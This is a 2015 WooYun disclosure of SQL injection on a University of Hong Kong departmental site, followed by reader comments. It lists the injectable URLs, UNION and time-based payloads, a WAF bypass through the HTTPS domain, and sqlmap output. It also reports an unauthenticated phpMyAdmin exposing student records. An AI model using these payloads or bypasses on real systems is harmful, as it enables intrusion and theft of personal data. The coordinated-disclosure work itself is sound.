当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145428

漏洞标题:香港大学某分站存在多处SQL注入漏洞(绕过WAF)

相关厂商:香港大学

漏洞作者: 路人甲

提交时间:2015-10-09 20:18

修复时间:2015-10-29 15:00

公开时间:2015-10-29 15:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态: 已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-10-29: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

http://t.qq.com/p/t/470498077400717
香港大学某分站存在多处SQL注入漏洞
附送一个未授权访问漏洞,可导致13000多名学生敏感信息泄露(明文密码),并可间接利用数据库获取多台服务器系统权限。

详细说明:

#1 注入点

http://www.mech.hku.hk/index.php?tpl=page&id=3
http://www.mech.hku.hk/index.php?tpl=news&cid=1
http://www.mech.hku.hk/index.php?tpl=people&cid=1


#2 注入的时候,有WAF,无法用工具跑

http://www.mech.hku.hk/index.php?tpl=news&cid=1 order by 4%23 # 字段为4
http://www.mech.hku.hk/index.php?tpl=news&cid=1 and 1=2 union select 1,2,3,4%23 # 直接服务器被断开


绕过方法就是换https的域名,httpd的配置文件配置不当

python sqlmap.py -u "**.**.**.**/index.php?tpl=page&id=3" --dbs


漏洞证明:

#3 注入成功

[*] starting at 21:19:41
[21:19:41] [INFO] resuming back-end DBMS 'mysql' 
[21:19:41] [INFO] testing connection to the target URL
[21:19:41] [INFO] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[21:19:42] [INFO] it appears that the target is not protected
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tpl=page&id=3 AND 1674=1674
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: tpl=page&id=-1583 UNION ALL SELECT NULL,CONCAT(0x71707a7671,0x487566664b4178587a6a,0x7170717671)#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: tpl=page&id=3 AND SLEEP(5)
---
[21:19:42] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0.11
[21:19:42] [INFO] fetching database names
[21:19:42] [WARNING] reflective value(s) found and filtering out
[21:19:42] [INFO] the SQL query used returns 2 entries
[21:19:42] [INFO] retrieved: information_schema
[21:19:43] [INFO] retrieved: mech
available databases [2]:                                                                                                                                                                                
[*] information_schema
[*] mech


#END 附送一个未授权访问漏洞,可导致13000多名学生敏感信息泄露,并可间接利用数据库获取多台服务器系统权限。

http://ns1.caes.hku.hk/phpmyadmin  phpmyadmin可不需要密码直接访问


student数据库中的User表中,存储了13000多名学生的信息

users.jpg


wordpress_login.jpg


gallery3.jpg


Host name: caes
Operating system: Linux 2.6.32-74-server
Apache: Apache/2.2.14 (Ubuntu)
PHP: 5.3.2-1ubuntu4.30
MySQL: 5.1.73-0ubuntu**.**.**.**


修复方案:

#1 WAF规则检测完善
#2 对存在SQL注入的参数进行安全转义

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-12 18:14

厂商回复:

已將事件通知有關機構

最新状态:

2015-10-29:相關機構回報已修復漏洞

漏洞评价:

评论

  1. 2015-10-08 21:27 | Q1NG ( 普通白帽子 | Rank:101 漏洞数:20 | 临 兵 斗 者 皆 阵 列 前 行 !)

    猪哥继续再来个

  2. 2015-10-08 21:44 | 随风的风 ( 普通白帽子 | Rank:131 漏洞数:48 | [code]时光如水,总是无言,你若安好,便是...)

    股市一跌。。猪猪侠就签到。。

  3. 2015-10-08 22:04 | 血梦 ( 实习白帽子 | Rank:43 漏洞数:12 | 一个自学成才的零零后。)

    666

  4. 2015-10-08 23:35 | Let a person cry. ( 路人 | Rank:23 漏洞数:9 | xxoo)

    只要股市下跌了,就看到猪猪侠出现发洞

  5. 2015-10-09 09:29 | 齐迹 ( 普通白帽子 | Rank:784 漏洞数:100 | 重庆地区招聘安全工程师。sec.zhubajie.com...)

    应该是猪猪侠出现发洞 股市就要大跌

  6. 2015-10-09 20:26 | 默之 ( 普通白帽子 | Rank:502 漏洞数:85 | 沉淀。)

    夭寿了!

  7. 2015-10-09 21:16 | M4sk ( 普通白帽子 | Rank:1213 漏洞数:321 | 国内信息安全任重而道远,还需要厂商和白帽...)

    漏洞可以匿名回去吗?

  8. 2015-10-09 21:25 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3564 漏洞数:274 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @M4sk 把原来的漏洞,重新发一遍,让管理再审核一次就可以了。

  9. 2015-10-09 21:39 | 随风的风 ( 普通白帽子 | Rank:131 漏洞数:48 | [code]时光如水,总是无言,你若安好,便是...)

    @猪猪侠 我读书少,你别骗我。。

  10. 2015-10-09 22:01 | M4sk ( 普通白帽子 | Rank:1213 漏洞数:321 | 国内信息安全任重而道远,还需要厂商和白帽...)

    @猪猪侠 哟西

  11. 2015-10-09 23:31 | 娃哈哈 ( 实习白帽子 | Rank:39 漏洞数:6 | 伟大的科学家)

    你关注的白帽子 猪猪侠 发表了漏洞 香港大学某分站存在多处SQL注入漏洞(绕过WAF) 2015-10-09你关注的白帽子 猪猪侠 发表了漏洞 香港大学某分站存在漏洞(可获得系统权限) 2015-10-09你关注的白帽子 猪猪侠 发表了漏洞 香港中文大学某分站存在漏洞(可获得系统权限) 2015-10-09你关注的白帽子 猪猪侠 发表了漏洞 香港中文大学多个分站存在SQL注入漏洞礼包(可获得系统权限) 2015-10-09你关注的白帽子 猪猪侠 发表了漏洞 电讯盈科旗下香港电讯系统存在漏洞(涉及移动電話认证服务、SIM卡增值服务) 2015-10-09

  12. 2015-10-10 22:22 | 神秘de路人甲 ( 路人 | Rank:15 漏洞数:2 | 我是神秘的路人甲)

    你关注的白帽子 猪猪侠 发表了漏洞 香港大学某分站存在多处SQL注入漏洞(绕过WAF) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 香港大学某分站存在漏洞(可获得系统权限) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 香港中文大学某分站存在漏洞(可获得系统权限) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 香港中文大学多个分站存在SQL注入漏洞礼包(可获得系统权限) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 电讯盈科旗下香港电讯系统存在漏洞(涉及移动電話认证服务、SIM卡增值服务) 2015-10-09

  13. 2015-10-11 23:10 | 心云 ( 路人 | Rank:29 漏洞数:16 | 遇见)

    你关注的白帽子 猪猪侠 发表了漏洞 香港大学某分站存在多处SQL注入漏洞(绕过WAF) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 香港大学某分站存在漏洞(可获得系统权限) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 香港中文大学某分站存在漏洞(可获得系统权限) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 香港中文大学多个分站存在SQL注入漏洞礼包(可获得系统权限) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 电讯盈科旗下香港电讯系统存在漏洞(涉及移动電話认证服务、SIM卡增值服务) 2015-10-09

  14. 2015-10-12 21:31 | 荫僵蓝殿 ( 路人 | Rank:4 漏洞数:2 | 逗逼僵尸。。。浪里格朗)

    你关注的白帽子 猪猪侠 发表了漏洞 香港大学某分站存在多处SQL注入漏洞(绕过WAF) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 香港大学某分站存在漏洞(可获得系统权限) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 香港中文大学某分站存在漏洞(可获得系统权限) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 香港中文大学多个分站存在SQL注入漏洞礼包(可获得系统权限) 2015-10-09 你关注的白帽子 猪猪侠 发表了漏洞 电讯盈科旗下香港电讯系统存在漏洞(涉及移动電話认证服务、SIM卡增值服务) 2015-10-09

  15. 2015-10-13 08:22 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    乌云有ID 没ID 都知道这是猪猪侠 还路人甲隐藏。。。